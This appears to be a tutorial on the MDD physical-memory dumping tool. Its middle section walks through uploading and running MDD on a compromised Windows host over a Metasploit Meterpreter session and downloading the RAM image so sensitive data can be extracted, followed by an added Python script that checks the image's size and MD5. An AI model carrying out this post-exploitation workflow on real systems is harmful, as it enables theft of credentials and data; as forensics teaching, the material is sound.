ManTech MDD (http://www.mantech.com/msma/MDD.asp) is released under the GPL. MDD copies the entire contents of physical memory on the following Microsoft operating systems: Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2008.
After downloading MDD from the ManTech site, you run it from the command line; it has no GUI. It needs an administrative prompt, because it reads physical memory through a kernel driver that it loads at start-up.
MDD command-line usage

    mdd -o <output file>

The output file is a raw image of physical memory. MDD prints the amount of memory dumped, the number of page-map operations that succeeded or failed, and the MD5 of the image it wrote; record that MD5, since it is what you later compare the copy you analyze against.

For example:

    C:\tools\mdd> mdd -o memory.dd
     -> mdd
     -> ManTech Physical Memory Dump Utility
        Copyright (C) 2008 ManTech Security & Mission Assurance
     -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
        This is free software, and you are welcome to redistribute it
        under certain conditions; use option `-c' for details.
     -> Dumping 255.48 MB of physical memory to file 'memory.dd'.
        65404 map operations succeeded (1.00)
        0 map operations failed
        took 21 seconds to write
        MD5 is: a48986bb0558498684414e9399ca19fc
The output file is usually referred to as the memory image. MDD only acquires physical memory; it does no analysis, so the image has to be examined with other tools.
In what follows we combine MDD with a Metasploit Meterpreter session to acquire memory from a compromised host.
First, upload MDD to the target.
    meterpreter > upload /root/mdd.exe .
    [*] uploading  : /root/mdd.exe -> .
    [*] uploaded   : /root/mdd.exe -> .\mdd.exe
    meterpreter > ls

    Listing: c:\
    ============

    Mode              Size       Type  Last modified                   Name
    ----              ----       ----  -------------                   ----
    100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
    100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
    40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
    100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
    100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
    100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
    40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
    40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
    40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
    100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
    100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
    100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
    100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys
Run MDD on the target to dump RAM. The Meterpreter session must have administrative rights, since MDD loads a driver to read physical memory. Here it is run from an interactive cmd.exe channel:

    meterpreter > execute -f "cmd.exe" -i -H
    Process 1908 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    c:\> mdd.exe -o memory.dd
    mdd.exe -o memory.dd
     -> mdd
     -> ManTech Physical Memory Dump Utility
        Copyright (C) 2008 ManTech Security & Mission Assurance
     -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
        This is free software, and you are welcome to redistribute it
        under certain conditions; use option `-c' for details.
     -> Dumping 511.48 MB of physical memory to file 'memory.dd'.
        130940 map operations succeeded (1.00)
        0 map operations failed
        took 23 seconds to write
        MD5 is: be9d1d906fac99fa01782e847a1c3144
Alternatively, run the tool directly through Meterpreter's execute command, passing the arguments with -a; no interactive shell is needed and the data is captured just the same (the banner and MD5 are not shown in this case, so note the image size from the listing instead):

    meterpreter > execute -f mdd.exe -a "-o demo.dd"
    Process 3436 created.
Confirm that the memory image was written:

    meterpreter > ls

    Listing: C:\
    ============

    Mode              Size       Type  Last modified                   Name
    ----              ----       ----  -------------                   ----
    100666/rw-rw-rw-  537604934  fil   Wed Dec 31 19:00:00 -0500 1969  92010NT_Disk2.zip
    100777/rwxrwxrwx  0          fil   Wed Dec 31 19:00:00 -0500 1969  AUTOEXEC.BAT
    100666/rw-rw-rw-  0          fil   Wed Dec 31 19:00:00 -0500 1969  CONFIG.SYS
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Config.Msi
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Documents and Settings
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  GetAd2
    100666/rw-rw-rw-  15642      fil   Wed Dec 31 19:00:00 -0500 1969  GetAd2.zip
    100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  IO.SYS
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Inetpub
    100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  MSDOS.SYS
    100555/r-xr-xr-x  47580      fil   Wed Dec 31 19:00:00 -0500 1969  NTDETECT.COM
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  PortQryV2
    40555/r-xr-xr-x   0          dir   Wed Dec 31 19:00:00 -0500 1969  Program Files
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  RECYCLER
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  System Volume Information
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  WINDOWS
    100666/rw-rw-rw-  146        fil   Wed Dec 31 19:00:00 -0500 1969  YServer.txt
    100666/rw-rw-rw-  194        fil   Wed Dec 31 19:00:00 -0500 1969  boot.ini
    100666/rw-rw-rw-  133677056  fil   Wed Dec 31 19:00:00 -0500 1969  demo.dd
    100777/rwxrwxrwx  95104      fil   Wed Dec 31 19:00:00 -0500 1969  mdd.exe
    100444/r--r--r--  233632     fil   Wed Dec 31 19:00:00 -0500 1969  ntldr
    100666/rw-rw-rw-  402653184  fil   Wed Dec 31 19:00:00 -0500 1969  pagefile.sys
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  passwordcrackers
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  share
    100777/rwxrwxrwx  869        fil   Wed Dec 31 19:00:00 -0500 1969  update.exe

demo.dd is present at 133677056 bytes, i.e. 127.48 MB of physical memory. Download the memory dump using Meterpreter:

    meterpreter > download memory.dd .
    [*] downloading: memory.dd -> .
    [*] downloaded : memory.dd -> ./demo.dd
    meterpreter >
With the .dd image now on the local machine, the sensitive data it holds can be extracted by following the Volatility walkthrough at http://forensiczone.blogspot.com/2009/01/using-volatility-1.html.
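Before handing the image to Volatility it is worth checking that what arrived over the Meterpreter channel is what MDD wrote: MDD reports the size, the page-map counters and an MD5 on the target, and a transfer that was truncated or an image with failed map operations will quietly produce wrong analysis results. The following Python script is an added example, not code from the original page or from ManTech; it parses the MDD banner shown above, recomputes the MD5 of the downloaded file, and compares the two. The one-megabyte pseudo-dump it builds for its own demonstration is constructed data, not real memory, and the accompanying MDD report string is fabricated to match it; the field names and the 0.05 MB size tolerance are this example's own choices.

```python
import hashlib
import os
import re
import tempfile

# Fields we pull out of MDD's console banner (see the dumps above).
# Assumption: the wording of these lines is stable across MDD runs.
MDD_OUTPUT_FIELDS = {
    "size_mb": re.compile(r"Dumping\s+([\d.]+)\s+MB of physical memory"),
    "ok":      re.compile(r"(\d+)\s+map operations succeeded"),
    "failed":  re.compile(r"(\d+)\s+map operations failed"),
    "md5":     re.compile(r"MD5 is:\s*([0-9a-fA-F]{32})"),
}


def parse_mdd_output(text):
    """Return size_mb (float), ok/failed counters (int) and the reported MD5."""
    found = {}
    for key, pattern in MDD_OUTPUT_FIELDS.items():
        m = pattern.search(text)
        if not m:
            raise ValueError("MDD output missing field: " + key)
        found[key] = m.group(1)
    return {
        "size_mb": float(found["size_mb"]),
        "ok": int(found["ok"]),
        "failed": int(found["failed"]),
        "md5": found["md5"].lower(),
    }


def md5_of_file(path, chunk=1 << 20):
    """Stream the file through MD5 so multi-gigabyte images do not need to fit in RAM."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_dump(path, mdd_output, tolerance_mb=0.05):
    """Compare a downloaded .dd with what MDD reported on the target.

    Returns (ok, reasons). A size or MD5 mismatch means the local copy is not
    the file MDD wrote (truncated or altered in transit); failed map
    operations mean pages MDD could not read, so the image has holes even if
    the hash matches.
    """
    report = parse_mdd_output(mdd_output)
    reasons = []
    actual_mb = os.path.getsize(path) / (1024 * 1024)
    if abs(actual_mb - report["size_mb"]) > tolerance_mb:
        reasons.append("size %.2f MB != reported %.2f MB" % (actual_mb, report["size_mb"]))
    actual_md5 = md5_of_file(path)
    if actual_md5 != report["md5"]:
        reasons.append("md5 %s != reported %s" % (actual_md5, report["md5"]))
    if report["failed"]:
        total = report["ok"] + report["failed"]
        reasons.append("%d of %d map operations failed; image has gaps" % (report["failed"], total))
    return (not reasons, reasons)


def demo(tmpdir=None):
    """Constructed walk-through: a 1 MiB pseudo-dump verified intact, then after
    one byte is changed as if the download had been corrupted in transit."""
    tmpdir = tmpdir or tempfile.mkdtemp()
    path = os.path.join(tmpdir, "demo.dd")
    data = bytes(range(256)) * 4096          # constructed content, not real memory
    with open(path, "wb") as f:
        f.write(data)
    # Fabricated MDD report matching the constructed file (1 MiB = 256 x 4 KiB pages).
    report = (
        "Dumping 1.00 MB of physical memory to file 'demo.dd'.\n"
        "256 map operations succeeded (1.00) 0 map operations failed\n"
        "took 1 seconds to write\n"
        "MD5 is: %s\n" % md5_of_file(path)
    )
    intact = verify_dump(path, report)
    with open(path, "r+b") as f:             # damage one byte in the second page
        f.seek(4096)
        f.write(b"\xff")
    corrupted = verify_dump(path, report)
    return intact, corrupted


if __name__ == "__main__":
    good, bad = demo()
    print("intact copy   :", good)
    print("corrupted copy:", bad)
```

For a real acquisition, paste the banner MDD printed on the target (the text after "Dumping ... MB", including the MD5 line) into verify_dump together with the path of the downloaded file; an MD5 mismatch means download it again, and a non-zero failed-map count is a fact about the image to record in your notes before analysis, since re-running MDD will not necessarily recover those pages.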